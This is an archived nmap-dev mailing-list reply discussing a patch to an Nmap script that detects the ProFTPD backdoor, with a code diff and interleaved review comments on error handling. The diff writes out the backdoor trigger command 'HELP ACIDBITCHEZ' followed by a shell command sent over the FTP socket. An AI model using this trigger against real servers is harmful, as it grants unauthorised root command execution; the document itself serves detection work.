
Re: [NSE] Detection of ProFTPD backdoor


From: Michael Meyer <michael.meyer () greenbone net>
Date: Mon, 13 Dec 2010 10:57:31 +0100

*** David Fifield <david () bamsoftware com> wrote:
On Sat, Dec 11, 2010 at 09:50:04AM +0100, Michael Meyer wrote:

+       sock:send("help foo\r\n")
+       sock:receive_lines(1)

Does it also work without the sock:send line?

Yes.

What about using the read_reply function from ftp-anon.nse, does
that work?

Yes, the following seems to work.

--- /tmp/2/nmap/scripts/ftp-proftpd-backdoor.nse        2010-12-08 14:09:07.000000000 +0100
+++ /usr/local/share/nmap/scripts/ftp-proftpd-backdoor.nse      2010-12-13 11:06:56.000000000 +0100
@@ -35,6 +35,45 @@
 local CMD_FTP = "HELP ACIDBITCHEZ"
 local CMD_SHELL = "id"
 
+local function read_reply(buffer)
+        local readline
+        local line, err
+        local code, message
+        local _, p, tmp
+
+        line, err = buffer()
+        if not line then
+                    return line, err
+        end
+
+        -- Single-line response?
+        code, message = string.match(line, "^(%d%d%d) (.*)$")
+        if code then
+                return tonumber(code), message
+        end
+
+        -- Multi-line response?
+        _, p, code, message = string.find(line, "^(%d%d%d)-(.*)$")
+        if p then
+        while true do
+                line, err = buffer()
+                if not line then
+                        return line, err
+                end
+                tmp = string.match(line, "^%d%d%d (.*)$")
+                if tmp then
+                        message = message .. "\n" .. tmp
+                        break
+                end
+                message = message .. "\n" .. line
+                end
+
+                return tonumber(code), message
+        end
+
+        return nil, string.format("Unparseable response: %q", line)
+end
+
 portrule = function (host, port)
        -- Check if version detection knows what FTP server this is.
        if port.version.product ~= nil and port.version.product ~= "ProFTPD" then
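Review bot: In read_reply's multi-line branch the body of `while true do` sits at the same indentation as the `while` itself, and `local readline` is declared but never used, so the new function is harder to read than it needs to be. Indenting the loop body one level and dropping `local readline` would fix that, and since the message says the function was taken from ftp-anon.nse, a header such as `-- Copied from ftp-anon.nse; keep in sync with that script.` would tell the next maintainer where to look. The terminating-line match `^%d%d%d (.*)$` also accepts any three-digit code rather than the one that opened the reply, which appears deliberate but deserves a one-line comment such as `-- any "ddd " line ends the multi-line reply; the code is not cross-checked`.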
@@ -82,15 +121,16 @@
                return
        end
 
-       -- Send command to escalate privilege.
-       status, err = sock:send(CMD_FTP .. "\r\n")
-       if not status then
-               stdnse.print_debug(1, "Failed to send privilege escalation command: %s", err)
-               sock:close()
-               return
-       end
+        -- Send command to escalate privilege.
+        buffer = stdnse.make_buffer(sock, "\r\n")
+        status, err = sock:send(CMD_FTP .. "\r\n")
+        if not status then
+                return status, err
+        end
+        code, message = read_reply(buffer)
 
        -- Send command(s) to shell, assuming that privilege escalation worked.
        status, err = sock:send(cmd .. ";\r\n")
        if not status then
                stdnse.print_debug(1, "Failed to send shell command(s): %s", err)
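Review bot: The result of `code, message = read_reply(buffer)` on the new side is never checked, so a nil/err return (socket timeout or an unparseable reply) still falls through to the shell command that follows, and the privilege-escalation reply is neither logged nor examined before the script continues. The rewritten send-failure branch also drops the `sock:close()` and the debug message the removed lines had, returning `status, err` with the socket still open. Checking the reply and restoring the cleanup keeps the detection from acting on a connection whose state is unknown; the enclosing action function starts and ends outside the hunk, and whether `buffer`, `code` and `message` are declared `local` there cannot be seen from here, so that should be confirmed. The new lines additionally use eight-space indentation where the surrounding context keeps the file's original indent.
```lua
        -- Send command to escalate privilege.
        buffer = stdnse.make_buffer(sock, "\r\n")
        status, err = sock:send(CMD_FTP .. "\r\n")
        if not status then
                stdnse.print_debug(1, "Failed to send privilege escalation command: %s", err)
                sock:close()
                return
        end
        -- Do not continue to the shell command unless the reply was read and parsed.
        code, message = read_reply(buffer)
        if not code then
                stdnse.print_debug(1, "Failed to read reply to privilege escalation command: %s", message)
                sock:close()
                return
        end
        -- … unchanged: shell command send …
```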

------------------------------------------------------------------------------------

Micha

